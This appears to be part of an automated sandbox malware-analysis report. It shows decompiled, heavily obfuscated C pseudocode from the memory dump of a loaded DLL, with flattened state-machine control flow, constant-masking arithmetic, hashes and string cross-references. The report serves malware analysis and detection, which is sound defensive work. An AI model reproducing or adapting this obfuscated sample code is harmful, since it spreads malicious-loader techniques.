0x02b452c2
0x02b452c5
0x00000000
0x02b452c5
0x02b45251
0x02b45249
0x00000000
0x02b4523d
0x02b45316
0x02b4531b
0x02b4531e
0x02b45320
0x02b45320
0x02b45320
0x02b45332

Strings

X\2, xrefs: 02B45164
E, xrefs: 02B451FD

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: E$X\2
API String ID: 0-703089088
Opcode ID: a622c2cfc6fa198885dac9ae8c3cd345e557f420a976a8c5cd4afa584c49a485
Instruction ID: 5a3c7994406287acacc3dfdb3afbee11e80991e451c92082282a71d998d36694
Opcode Fuzzy Hash: a622c2cfc6fa198885dac9ae8c3cd345e557f420a976a8c5cd4afa584c49a485
Instruction Fuzzy Hash: D99121715083809BC368CF25D88A91BBBE2FBC5398F544A1DF6D696260D3B1CA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 02B3DE74, Relevance: 2.7, Strings: 2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02B3DE74() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t162;
				intOrPtr _t166;
				intOrPtr _t168;
				void* _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr _t196;
				void* _t201;
				char _t202;
				signed int* _t203;
				void* _t205;

				_t203 =  &_v92;
				_v48 = 0x569f20;
				_v48 = _v48 * 0x6b;
				_t169 = 0;
				_v48 = _v48 ^ 0x2435b753;
				_t201 = 0xa773912;
				_v36 = 0xa39ca1;
				_v36 = _v36 + 0xffff508a;
				_v36 = _v36 ^ 0x00aa5884;
				_v84 = 0x943e6a;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0x5d77;
				_t171 = 0x78;
				_v84 = _v84 * 0xe;
				_v84 = _v84 ^ 0x0005cfbb;
				_v72 = 0x1e0d0a;
				_v72 = _v72 | 0x4cfb6fde;
				_v72 = _v72 + 0xffff94ff;
				_v72 = _v72 ^ 0x4cfa3edf;
				_v80 = 0xa086f6;
				_v80 = _v80 << 0x10;
				_v80 = _v80 >> 5;
				_v80 = _v80 + 0xffff18d5;
				_v80 = _v80 ^ 0x0432d7e2;
				_v68 = 0xb8dd27;
				_v68 = _v68 | 0xebb7bfbf;
				_v68 = _v68 ^ 0xebb8c1a9;
				_v32 = 0x418b74;
				_v32 = _v32 * 0x7e;
				_v32 = _v32 ^ 0x2049f6fa;
				_v64 = 0x577cf5;
				_v64 = _v64 * 0x64;
				_v64 = _v64 / _t171;
				_v64 = _v64 ^ 0x004a237d;
				_v76 = 0x4c7ee;
				_v76 = _v76 ^ 0x14a6b669;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x4a231390;
				_v44 = 0xd26523;
				_v44 = _v44 | 0x7504cc1f;
				_v44 = _v44 ^ 0x75d3d950;
				_v88 = 0x7e3e67;
				_v88 = _v88 >> 5;
				_v88 = _v88 + 0xfffffc49;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x000c6abf;
				_v40 = 0x647ef6;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00028bbb;
				_v92 = 0x531e5a;
				_v92 = _v92 << 8;
				_v92 = _v92 | 0xbedf5cfb;
				_v92 = _v92 ^ 0xffdbb821;
				_v52 = 0xaf5b7e;
				_v52 = _v52 ^ 0x54b2eb64;
				_v52 = _v52 >> 3;
				_v52 = _v52 ^ 0x0a8e907d;
				_v56 = 0x7e69cb;
				_t172 = 0x76;
				_v56 = _v56 / _t172;
				_v56 = _v56 + 0xffff7440;
				_v56 = _v56 ^ 0x00047804;
				_v60 = 0x4d1deb;
				_v60 = _v60 | 0x7db56f6d;
				_v60 = _v60 + 0xffff2308;
				_v60 = _v60 ^ 0x7dffdcf4;
				_t200 = _v28;
				_t202 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t201 - 0xa773912;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t201 = 0xa19a195;
							continue;
						}
						if(_t201 == 0x6df88bf) {
							E02B354B6(_v52, _v56, _v60, _t200);
							L25:
							return _t169;
						}
						if(_t201 == 0x82168a7) {
							E02B52B09(_v88, _v24, _v40, _v92);
							_t201 = 0x6df88bf;
							continue;
						}
						if(_t201 == 0x88022e2) {
							_t196 =  *0x2b56214; // 0x0
							E02B4E0F2(_v8 + 1, _t196 + 0x23c, _v76, _v44, _v12);
							_t162 =  *0x2b56214; // 0x0
							_t203 =  &(_t203[3]);
							_t169 = 1;
							_t201 = 0x82168a7;
							 *((intOrPtr*)(_t162 + 0x24)) = _v16;
							continue;
						}
						if(_t201 != 0xa19a195) {
							goto L22;
						} else {
							_t202 = E02B3C307();
							_t201 = 0xf928839;
							continue;
						}
					}
					if(_t201 == 0xbfd8a94) {
						if(E02B3E640(_v32, _v64,  &_v24,  &_v16) == 0) {
							_t201 = 0x82168a7;
							goto L22;
						}
						_t201 = 0x88022e2;
						goto L1;
					}
					if(_t201 == 0xeffcd22) {
						_t201 = 0x6df88bf;
						if(_v28 > 2) {
							_t166 = E02B4F840( *((intOrPtr*)(_t200 + 8)), _v80,  &_v20, _v68);
							_v24 = _t166;
							if(_t166 != 0) {
								_t201 = 0xbfd8a94;
							}
						}
						goto L1;
					}
					if(_t201 != 0xf928839) {
						goto L22;
					}
					_t168 = E02B48C7D(_t202, _v36,  &_v28, _v84, _v72);
					_t200 = _t168;
					_t203 =  &(_t203[3]);
					if(_t168 == 0) {
						goto L25;
					}
					_t201 = 0xeffcd22;
					goto L1;
					L22:
				} while (_t201 != 0x8019399);
				goto L25;
			}

0x02b3de74
0x02b3de77
0x02b3de8a
0x02b3de8e
0x02b3de90
0x02b3de98
0x02b3de9d
0x02b3dea5
0x02b3dead
0x02b3deb5
0x02b3debd
0x02b3dec2
0x02b3ded1
0x02b3ded4
0x02b3ded8
0x02b3dee0
0x02b3dee8
0x02b3def0
0x02b3def8
0x02b3df00
0x02b3df08
0x02b3df0d
0x02b3df12
0x02b3df1a
0x02b3df22
0x02b3df2a
0x02b3df32
0x02b3df3a
0x02b3df47
0x02b3df4b
0x02b3df53
0x02b3df60
0x02b3df6c
0x02b3df70
0x02b3df78
0x02b3df80
0x02b3df88
0x02b3df8d
0x02b3df95
0x02b3df9d
0x02b3dfa5
0x02b3dfad
0x02b3dfb5
0x02b3dfba
0x02b3dfc2
0x02b3dfc7
0x02b3dfcf
0x02b3dfd7
0x02b3dfdc
0x02b3dfe4
0x02b3dfec
0x02b3dff1
0x02b3dff9
0x02b3e001
0x02b3e009
0x02b3e011
0x02b3e016
0x02b3e01e
0x02b3e02a
0x02b3e02d
0x02b3e031
0x02b3e039
0x02b3e041
0x02b3e049
0x02b3e051
0x02b3e059
0x02b3e061
0x02b3e065
0x02b3e065
0x02b3e069
0x02b3e069
0x02b3e069
0x02b3e069
0x02b3e06f
0x00000000
0x00000000
0x02b3e075
0x02b3e116
0x00000000
0x02b3e116
0x02b3e081
0x02b3e1f3
0x02b3e1fd
0x02b3e203
0x02b3e203
0x02b3e08d
0x02b3e105
0x02b3e10c
0x00000000
0x02b3e10c
0x02b3e095
0x02b3e0c1
0x02b3e0d4
0x02b3e0d9
0x02b3e0e4
0x02b3e0e7
0x02b3e0e8
0x02b3e0ed
0x00000000
0x02b3e0ed
0x02b3e09d
0x00000000
0x02b3e0a3
0x02b3e0ac
0x02b3e0ae
0x00000000
0x02b3e0ae
0x02b3e09d
0x02b3e126
0x02b3e1c7
0x02b3e1d3
0x00000000
0x02b3e1d3
0x02b3e1c9
0x00000000
0x02b3e1c9
0x02b3e132
0x02b3e174
0x02b3e179
0x02b3e18f
0x02b3e194
0x02b3e19c
0x02b3e1a2
0x02b3e1a2
0x02b3e19c
0x00000000
0x02b3e179
0x02b3e13a
0x00000000
0x00000000
0x02b3e153
0x02b3e158
0x02b3e15a
0x02b3e15f
0x00000000
0x00000000
0x02b3e165
0x00000000
0x02b3e1d8
0x02b3e1d8
0x00000000

Strings

g>~, xrefs: 02B3DFAD
}#J, xrefs: 02B3DF70

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: g>~$}#J
API String ID: 0-4030106083
Opcode ID: eda6372481fa6842a3b9156d890571bb20b8ddb19dc91ca05f7d3494387d0afe
Instruction ID: 7ca78f08dc6202147478777a3a1320461a70fb94055abccee4bc7fc9ae157d29
Opcode Fuzzy Hash: eda6372481fa6842a3b9156d890571bb20b8ddb19dc91ca05f7d3494387d0afe
Instruction Fuzzy Hash: 189151728083419BC759CF69C48581BFBE1FF84358F504A6EF89A96260C3B5DA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 02B3E7DE, Relevance: 2.7, Strings: 2, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E02B3E7DE(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t180;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				void* _t194;
				signed int* _t212;
				signed int* _t215;

				_t212 = _a8;
				_push(_a12);
				_t211 = _a4;
				_push(_t212);
				_push(_a4);
				_push(__ecx);
				E02B4FE29(_t159);
				_v88 = 0xa74a92;
				_t215 =  &(( &_v128)[5]);
				_v88 = _v88 + 0x6289;
				_v88 = _v88 ^ 0x00a7ad1b;
				_t194 = 0x98d5ac6;
				_v72 = 0xabb696;
				_v72 = _v72 + 0xffffe542;
				_v72 = _v72 ^ 0x00a9fc0a;
				_v120 = 0x8dd565;
				_v120 = _v120 + 0xffff1d47;
				_v120 = _v120 + 0x56a1;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x46a17a82;
				_v124 = 0x8aacb4;
				_t189 = 0x6e;
				_v124 = _v124 / _t189;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x000ba54e;
				_v76 = 0x9f90a6;
				_v76 = _v76 | 0x682faec6;
				_v76 = _v76 ^ 0x68b53021;
				_v80 = 0xfbe8ab;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0xbe8fb9cd;
				_v84 = 0x1efa1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0009eae4;
				_v92 = 0xb2d03c;
				_v92 = _v92 ^ 0x8bcf93b7;
				_v92 = _v92 ^ 0x8b76d684;
				_v100 = 0x2cdd15;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x00bdfcd6;
				_v104 = 0x2a00e4;
				_v104 = _v104 | 0x603c2e46;
				_v104 = _v104 + 0xffff11ee;
				_v104 = _v104 ^ 0x6032c829;
				_v128 = 0xd0d9f9;
				_v128 = _v128 + 0x4e1d;
				_t190 = 0x14;
				_v128 = _v128 * 0x58;
				_v128 = _v128 / _t190;
				_v128 = _v128 ^ 0x0398a77e;
				_v68 = 0x2cfb4c;
				_t191 = 0x67;
				_v68 = _v68 / _t191;
				_v68 = _v68 ^ 0x000f6b94;
				_v112 = 0x1ddb62;
				_v112 = _v112 + 0x6002;
				_v112 = _v112 << 2;
				_v112 = _v112 + 0xe88d;
				_v112 = _v112 ^ 0x0072622d;
				_v116 = 0x4c27f5;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 | 0x0ee4ea1c;
				_v116 = _v116 * 0x4e;
				_v116 = _v116 ^ 0x89b93018;
				_v108 = 0x73a5e7;
				_v108 = _v108 * 0x7d;
				_v108 = _v108 >> 1;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x3c03dbf2;
				_v64 = 0x20f8;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x0009aa09;
				_v96 = 0x5991b1;
				_v96 = _v96 | 0x807a0890;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0x03d0ebbf;
				do {
					while(_t194 != 0x8b4e35) {
						if(_t194 == 0x2701dd5) {
							E02B4CAD5(_v68, _v112, __eflags, _v116, _t211,  &_v60);
							_t215 =  &(_t215[3]);
							_t194 = 0x8b4e35;
							continue;
						} else {
							if(_t194 == 0x3d33b80) {
								_push(_t194);
								_push(_t194);
								_t180 = E02B3C5D8(_t212[1]);
								_t215 =  &(_t215[3]);
								 *_t212 = _t180;
								__eflags = _t180;
								if(__eflags != 0) {
									_t194 = 0x48381f5;
									continue;
								}
							} else {
								if(_t194 == 0x48381f5) {
									E02B322A6(_t212, _v80,  &_v60, _v84);
									_t215 =  &(_t215[2]);
									_t194 = 0xae51dd8;
									continue;
								} else {
									if(_t194 == 0x62374bf) {
										_t212[1] = E02B45333(_t211);
										_t194 = 0x3d33b80;
										continue;
									} else {
										if(_t194 == 0x98d5ac6) {
											_t194 = 0x62374bf;
											 *_t212 =  *_t212 & 0x00000000;
											_t212[1] = _v88;
											continue;
										} else {
											if(_t194 != 0xae51dd8) {
												goto L16;
											} else {
												E02B40A90(_v92, _v100, _v104,  &_v60, _v128,  *((intOrPtr*)(_t211 + 0x20)));
												_t215 =  &(_t215[4]);
												_t194 = 0x2701dd5;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E02B4CAD5(_v108, _v64, __eflags, _v96, _t211 + 0x18,  &_v60);
					_t215 =  &(_t215[3]);
					_t194 = 0x462b9b2;
					L16:
					__eflags = _t194 - 0x462b9b2;
				} while (__eflags != 0);
				L17:
				__eflags =  *_t212;
				_t158 =  *_t212 != 0;
				__eflags = _t158;
				return 0 | _t158;
			}

0x02b3e7e7
0x02b3e7ef
0x02b3e7f6
0x02b3e7fd
0x02b3e7fe
0x02b3e800
0x02b3e801
0x02b3e806
0x02b3e80e
0x02b3e811
0x02b3e81b
0x02b3e823
0x02b3e828
0x02b3e830
0x02b3e838
0x02b3e840
0x02b3e848
0x02b3e850
0x02b3e858
0x02b3e85d
0x02b3e865
0x02b3e873
0x02b3e878
0x02b3e87e
0x02b3e883
0x02b3e887
0x02b3e88f
0x02b3e897
0x02b3e89f
0x02b3e8a7
0x02b3e8af
0x02b3e8b4
0x02b3e8bc
0x02b3e8c4
0x02b3e8c9
0x02b3e8d1
0x02b3e8d9
0x02b3e8e1
0x02b3e8e9
0x02b3e8f9
0x02b3e8fe
0x02b3e906
0x02b3e90e
0x02b3e916
0x02b3e91e
0x02b3e926
0x02b3e92e
0x02b3e93b
0x02b3e93e
0x02b3e94a
0x02b3e94e
0x02b3e956
0x02b3e962
0x02b3e965
0x02b3e969
0x02b3e971
0x02b3e979
0x02b3e981
0x02b3e986
0x02b3e98e
0x02b3e996
0x02b3e99e
0x02b3e9a8
0x02b3e9ba
0x02b3e9be
0x02b3e9c6
0x02b3e9d3
0x02b3e9d7
0x02b3e9db
0x02b3e9e0
0x02b3e9e8
0x02b3e9f0
0x02b3e9f5
0x02b3e9fd
0x02b3ea05
0x02b3ea0d
0x02b3ea12
0x02b3ea1a
0x02b3ea1a
0x02b3ea2c
0x02b3eb00
0x02b3eb05
0x02b3eb08
0x00000000
0x02b3ea32
0x02b3ea38
0x02b3ead4
0x02b3ead5
0x02b3ead9
0x02b3eade
0x02b3eae1
0x02b3eae3
0x02b3eae5
0x02b3eae7
0x00000000
0x02b3eae7
0x02b3ea3e
0x02b3ea40
0x02b3eab2
0x02b3eab7
0x02b3eaba
0x00000000
0x02b3ea42
0x02b3ea44
0x02b3ea96
0x02b3ea99
0x00000000
0x02b3ea46
0x02b3ea4c
0x02b3ea85
0x02b3ea87
0x02b3ea8a
0x00000000
0x02b3ea4e
0x02b3ea54
0x00000000
0x02b3ea5a
0x02b3ea72
0x02b3ea77
0x02b3ea7a
0x00000000
0x02b3ea7a
0x02b3ea54
0x02b3ea4c
0x02b3ea44
0x02b3ea40
0x02b3ea38
0x00000000
0x02b3ea2c
0x02b3eb27
0x02b3eb2c
0x02b3eb2f
0x02b3eb34
0x02b3eb34
0x02b3eb34
0x02b3eb40
0x02b3eb42
0x02b3eb47
0x02b3eb47
0x02b3eb51

Strings

-br, xrefs: 02B3E98E
F.<`, xrefs: 02B3E90E

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -br$F.<`
API String ID: 0-3678315648
Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction ID: 6b0c396fd20699229be57f94a156bdf46571e176f695aae96632a511442b93f4
Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction Fuzzy Hash: E9912FB15083819FC359CF65D98992BBBE1FBD4748F00891EF69696260D3B1DA48CF83

Uniqueness

Uniqueness Score: -1.00%

Function 02B4654A, Relevance: 2.7, Strings: 2, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E02B4654A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _v88;
				char* _v92;
				char* _v96;
				signed int _v100;
				char _v104;
				char _v624;
				char _v1144;
				void* _t168;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed int _t206;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t168);
				_v48 = 0xcd00f6;
				_v48 = _v48 + 0xcd83;
				_v48 = _v48 ^ 0x09b3856c;
				_v48 = _v48 ^ 0x097e4b14;
				_v68 = 0x47ecc1;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x0000069b;
				_v56 = 0x5623e4;
				_t204 = 0x5e;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x07a7b883;
				_v60 = 0x9f93bd;
				_v60 = _v60 ^ 0x1b2b58cc;
				_v60 = _v60 ^ 0x1bb3b428;
				_v36 = 0x1947a4;
				_v36 = _v36 | 0x7bdfb0e1;
				_v36 = _v36 ^ 0x7bdfc232;
				_v52 = 0x76ccb;
				_v52 = _v52 * 0x2b;
				_v52 = _v52 ^ 0x7f6a3668;
				_v52 = _v52 ^ 0x7e52560e;
				_v24 = 0x419396;
				_v24 = _v24 / _t204;
				_t205 = 0x46;
				_v24 = _v24 * 0x57;
				_v24 = _v24 ^ 0x845af85c;
				_v24 = _v24 ^ 0x84646483;
				_v16 = 0xd7b9b6;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x000408e3;
				_v44 = 0x89b89f;
				_v44 = _v44 * 0x1b;
				_v44 = _v44 / _t205;
				_v44 = _v44 ^ 0x00329adc;
				_v40 = 0x7c911;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0x9fb7bc96;
				_v40 = _v40 ^ 0x9fbb58de;
				_v32 = 0x2960c2;
				_v32 = _v32 >> 0xd;
				_t206 = 0x3b;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x000737d7;
				_v8 = 0x50758c;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 / _t206;
				_v8 = _v8 + 0xffffa1a5;
				_v8 = _v8 ^ 0x002c6c3d;
				_v72 = 0xae2241;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x0004039d;
				_v28 = 0x59a91e;
				_v28 = _v28 * 0x35;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 + 0x675a;
				_v28 = _v28 ^ 0x00026f30;
				_v64 = 0xf7748e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 ^ 0x3526d747;
				_v20 = 0x936b67;
				_v20 = _v20 + 0xffff21a6;
				_v20 = _v20 + 0x6733;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x0025db68;
				_v12 = 0x60291e;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0xffff2f3b;
				_v12 = _v12 ^ 0xbff2968b;
				E02B4FE2A(_v60, _v36, 0x1e,  &_v104);
				E02B4FE2A(_v52, _v24, 0x208,  &_v624);
				E02B4FE2A(_v16, _v44, 0x208,  &_v1144);
				E02B3E204(_v40, _v32,  &_v624, _a4);
				E02B3E204(_v8, _v72,  &_v1144, _a12);
				_v100 = _v48;
				_v96 =  &_v624;
				_v92 =  &_v1144;
				_v88 = _v56 | _v68 | 0x00000410;
				_t200 = E02B3E4F8( &_v104, _v28, _v64, _v20, _v12);
				asm("sbb eax, eax");
				return  ~_t200 + 1;
			}

0x02b46554
0x02b46557
0x02b4655a
0x02b4655d
0x02b4655e
0x02b4655f
0x02b46564
0x02b4656d
0x02b46574
0x02b4657b
0x02b46582
0x02b46589
0x02b4658d
0x02b46594
0x02b465a1
0x02b465a4
0x02b465a7
0x02b465ab
0x02b465b2
0x02b465b9
0x02b465c0
0x02b465c7
0x02b465ce
0x02b465d5
0x02b465dc
0x02b465e7
0x02b465ea
0x02b465f1
0x02b465f8
0x02b46606
0x02b4660d
0x02b46610
0x02b46613
0x02b4661a
0x02b46621
0x02b46628
0x02b4662c
0x02b46630
0x02b46634
0x02b4663b
0x02b46646
0x02b46650
0x02b46653
0x02b4665a
0x02b46661
0x02b46665
0x02b4666c
0x02b46673
0x02b4667a
0x02b46682
0x02b46683
0x02b46686
0x02b4668d
0x02b46698
0x02b466a0
0x02b466a3
0x02b466aa
0x02b466b1
0x02b466b8
0x02b466bc
0x02b466c3
0x02b466ce
0x02b466d1
0x02b466d5
0x02b466dc
0x02b466e3
0x02b466ee
0x02b466f4
0x02b466fb
0x02b46702
0x02b46709
0x02b46710
0x02b46714
0x02b4671b
0x02b46722
0x02b46729
0x02b4672d
0x02b46734
0x02b46744
0x02b4675c
0x02b4676f
0x02b46784
0x02b46799
0x02b467a4
0x02b467ad
0x02b467b6
0x02b467ca
0x02b467d4
0x02b467de
0x02b467e5

Strings

#V, xrefs: 02B46594
=l,, xrefs: 02B466AA

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: =l,$#V
API String ID: 0-882995766
Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction ID: 99f0881dbc9d1a42749b48ef2d3f4d498aa1ccbcc62f32b2b7f83d4ac15f1369
Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction Fuzzy Hash: BA81FFB1D0120DEBCF08CFA0D98A8EEBBB5FF48308F208159E515BA250D7B45A49DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02B45333, Relevance: 2.6, Strings: 2, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E02B45333(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t101;
				void* _t104;
				signed int _t105;
				signed int _t106;
				void* _t108;
				void* _t116;
				void* _t117;
				signed int* _t119;

				_t108 = __ecx;
				_t119 =  &_v40;
				_v16 = 0x92c19;
				_v16 = _v16 ^ 0x628de80f;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x84c9db68;
				_v4 = 0x30e06a;
				_v4 = _v4 ^ 0x4daac4de;
				_v4 = _v4 ^ 0x4d95dd20;
				_v20 = 0x313cca;
				_t105 = 0xc;
				_v20 = _v20 / _t105;
				_v20 = _v20 >> 9;
				_t116 = 0;
				_v20 = _v20 ^ 0x00013d87;
				_t117 = 0xe755a9f;
				_v40 = 0xb13641;
				_t106 = 0x59;
				_v40 = _v40 / _t106;
				_v40 = _v40 << 1;
				_v40 = _v40 | 0xaf38654a;
				_v40 = _v40 ^ 0xaf356b5c;
				_v24 = 0xb3ef74;
				_v24 = _v24 ^ 0x556457b4;
				_v24 = _v24 * 0x55;
				_v24 = _v24 ^ 0x80aa83de;
				_v28 = 0x9b3a5a;
				_v28 = _v28 + 0x3060;
				_v28 = _v28 + 0xffffd119;
				_v28 = _v28 ^ 0x00918c22;
				_v32 = 0x1265dc;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 | 0x6a7496c5;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x25b994ca;
				_v36 = 0xc9b3ee;
				_v36 = _v36 >> 5;
				_v36 = _v36 + 0x1e11;
				_v36 = _v36 << 3;
				_v36 = _v36 ^ 0x0035933c;
				_v8 = 0x402308;
				_v8 = _v8 ^ 0x846a3c70;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x2152b8ae;
				_v12 = 0xd9cdb9;
				_v12 = _v12 * 0x16;
				_v12 = _v12 | 0x05b8ac83;
				_v12 = _v12 ^ 0x17b93340;
				do {
					while(_t117 != 0xb1e0fe5) {
						if(_t117 == 0xb7b3e2e) {
							_t116 = _t116 + E02B4BE8C(_t108 + 0x18, _v32, _v36, _v8, _v12);
						} else {
							if(_t117 == 0xcf04418) {
								_t104 = E02B4BE8C(_t108, _v20, _v40, _v24, _v28);
								_t119 =  &(_t119[3]);
								_t117 = 0xb7b3e2e;
								_t116 = _t116 + _t104;
								continue;
							} else {
								if(_t117 != 0xe755a9f) {
									goto L8;
								} else {
									_t117 = 0xb1e0fe5;
									continue;
								}
							}
						}
						L11:
						return _t116;
					}
					_push(_t108);
					_t101 = E02B407F0();
					_t119 =  &(_t119[1]);
					_t117 = 0xcf04418;
					_t116 = _t116 + _t101;
					L8:
				} while (_t117 != 0x795fd89);
				goto L11;
			}

0x02b45333
0x02b45333
0x02b45336
0x02b45340
0x02b45348
0x02b4534d
0x02b45355
0x02b4535d
0x02b45365
0x02b4536d
0x02b4537f
0x02b45384
0x02b4538a
0x02b4538f
0x02b45391
0x02b45399
0x02b4539e
0x02b453af
0x02b453b7
0x02b453bb
0x02b453bf
0x02b453c7
0x02b453cf
0x02b453d7
0x02b453e4
0x02b453e8
0x02b453f0
0x02b453f8
0x02b45400
0x02b45408
0x02b45410
0x02b45418
0x02b4541d
0x02b45425
0x02b4542a
0x02b45432
0x02b4543a
0x02b4543f
0x02b45447
0x02b4544c
0x02b45454
0x02b4545c
0x02b45464
0x02b45469
0x02b45471
0x02b4547e
0x02b45482
0x02b4548a
0x02b45492
0x02b45492
0x02b45498
0x02b45509
0x02b4549a
0x02b454a0
0x02b454be
0x02b454c3
0x02b454c6
0x02b454c8
0x00000000
0x02b454a2
0x02b454a8
0x00000000
0x02b454aa
0x02b454aa
0x00000000
0x02b454aa
0x02b454a8
0x02b454a0
0x02b4550b
0x02b45514
0x02b45514
0x02b454d4
0x02b454d5
0x02b454da
0x02b454dd
0x02b454e2
0x02b454e4
0x02b454e4
0x00000000

Strings

`0, xrefs: 02B453F8
j0, xrefs: 02B45355

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: `0$j0
API String ID: 0-1706687062
Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction ID: 7e7e7e6be50c164702c9ab7cc7423377e434c9ecca42eafba798fe1195b78a14
Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction Fuzzy Hash: 224153728083019BC354DF21998940BFBE1FBD8B48F544E2DF8A9A6260C3708A59CF93

Uniqueness

